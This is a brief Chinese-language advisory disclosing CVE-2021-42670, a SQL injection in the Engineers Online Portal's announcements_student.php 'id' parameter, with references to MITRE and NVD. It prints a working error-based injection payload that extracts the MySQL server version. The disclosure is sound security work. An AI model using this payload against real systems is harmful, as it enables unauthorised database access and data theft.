CVE-2021-42670 - 工程师在线门户系统中的SQL注入漏洞。
工程师在线门户(Engineers Online Portal)存在SQL注入漏洞。攻击者可以通过利用"announcements_student.php"网页中的脆弱参数"id"来操纵执行的SQL查询。 因此,攻击者可以从web服务器中提取敏感数据。
受影响组件 -
脆弱页面 - announcements_student.php
脆弱参数 - "id"
以下payload将允许你提取运行在web服务器上的MySql服务器版本 -
1' AND (SELECT 4356 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(MID((IFNULL(CAST(VERSION() AS NCHAR),0x20)),1,51)),0x7178786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pMLo'='pMLo

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42670
https://nvd.nist.gov/vuln/detail/CVE-2021-42670
Alon Leviev(0xDeku), 2021年10月22日。